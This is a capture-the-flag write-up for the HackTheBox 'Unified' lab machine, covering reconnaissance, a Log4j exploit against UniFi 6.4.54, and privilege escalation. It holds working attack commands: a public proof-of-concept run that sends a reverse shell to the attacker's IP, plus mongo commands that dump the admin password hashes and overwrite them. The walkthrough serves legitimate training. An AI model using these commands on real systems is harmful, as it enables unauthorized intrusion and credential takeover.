Unified

Summary

Part of Starting Point's Tier 2 boxes, Unified revolves around exploiting the Log4j vulnerability. Securing the initial foothold entails identifying the application's version through meticulous enumeration of the web server. Subsequently, leveraging a readily available allows us to gain access to the application using the administrator account. Further reconnaissance within the site exposes plaintext SSH credentials, allowing us to root the box.

Step	Action	Tool	Gained
1	Web server enumeration	Browser	Web app's version
2	Researching	Browser	Log4j vulnerability &
3	Using		Foothold
4	Updating admin's password	mongo	Web application credentials
5	Web server enumeration	Browser	Privilege escalation

Recon

Port Scan

As always, let's start with a port scan. For efficiency, we will run a fast (-T5 --min-rate 10000) all-ports (-p-) scan first to find out which of them are open (-open), and then we will do a version scanning (-sV) as well as use Nmap's default scripts (-sC) against open ports only.

# Scanning all ports at maximum speed
$ sudo nmap 10.129.158.126 -T5 --min-rate 10000 -open -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 17:37 BST
Nmap scan report for 10.129.158.126
Host is up (0.038s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
6789/tcp open  ibm-db2-admin
8080/tcp open  http-proxy
8443/tcp open  https-alt
8843/tcp open  unknown
8880/tcp open  cddbp-alt

Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
# Version-scanning the specified ports at max speed plus using default scripts
$ sudo nmap 10.129.158.126 -T5 --min-rate 10000 -p 22,6789,8080,8443,8843,8880 -sC -sV
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3
<SNIP>
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
|_http-title: Did not follow redirect to https://10.129.158.126:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
<SNIP>
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
8843/tcp open  ssl/unknown
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
<SNIP>
8880/tcp open  cddbp-alt?

Based on Nmap's output, we can note some things down:

• There is an SSH port open (22) which might represent the way to access the box.

• There is an HTTP port (8080) which redirects to https://10.129.158.126:8443/manage which seems interesting.

• The port 6789 seems to be used for an application called UniFi Mobile Speed Test.
• The last port (8880) is related with a protocol called CDDB and it's also related with the UniFi Network.

Web Server Enumeration

By visiting the redirected URL we found above, we land on the UniFi login page which also include its version: 6.4.54 (Figure 1).

Figure 1: The UniFi login page along with its version.

Foothold

Log4j

Since we know the application's version, we can check if any known vulnerability exists. Doing that, reveals the Log4j vulnerability (Figure 2.1) as well as a GitHub repository with a (Figure 2.2).

Figure 2: Rsearching known vulnerabities for UniFi 6.4.54.

The SprocketSecurity article includes both an exploitation and a post-exploitation route, but let's first try the PoC as it involves less steps. By opening a listener (Figure 3.1) and following the PoC's execution instructions (Figure 3.2), we indeed achieve and secure our foothold (Figure 3.3).

# executing the PoC
sudo python3 exploit.py -u https://10.129.96.149:8443 -i 10.10.14.147 -p 1337

Figure 3: Establishing our initial foothold.

Shell Upgrade

Before searching for the flag, we can first upgrade our shell (Figure 4).

Check more about shell upgrades here.

# Checking if script is available
which script
# Spawning the bash shell
script /dev/null -c /bin/bash
# Backgrounding the shell (CTRL+Z)
^Z
# Checking the configurations of our local shell
echo $TERM && stty size
# Disabling echo, passing I/O straight through, and foregrounding the shell
stty raw -echo; fg
# Setting terminals dimensions
stty rows 51 cols 209
# Exproting terminal
export TERM=xterm

Figure 4: Upgrading our shell with script.

We can now read the user.txt flag within the home directory of the sole user of the box.

# Checking users
unifi@unified:/unifi/data$ ls /home
michael
# Reading the user flag
unifi@unified:/unifi/data$ cat /home/michael/user.txt
6ce<REDACTED>127

Privilege Escalation

Mongodb Exploitation

The post-exploitation part of the article refers to a mongodb from which we can dump password hashes from. Let's check if we can do that (Figure 5).

# Dumping the password hashes
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Figure 5: Dumping hashes from the mongodb database.

Next, according to the article, we can encrypt a new password (Figure 6.1) and use it to change the administrator's password (Figure 6.2), so we can then use it to log in into the UniFi portal as a privileged user (Figure 7).

# Encrypting the new password
mkpasswd -m sha-512 Password123!
# Changing the administrator's password
mongo --port 27117 ace --eval 'db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$Zpy/bK4oaMXbjkwG$gPVsT76.dDkLpzgvEZm39v2kvkqfytwFzuzOHOW5MmkgFtN9UXDbg0FZ58hckZEq2g83mE9bWNqXDi6itVvd91"}})'

Figure 6: Changing the administrator's password.

Figure 7: Logging in as administrator.

UniFi Enumeration

By enumerating the UniFi portal, we can find the root's plaintext password (Figure 8) which we can use right away and read the root.txt flag 🚩 (Figure 9).

Figure 8: Enumerating the root's SSH password.

Figure 9: Reading the root flag.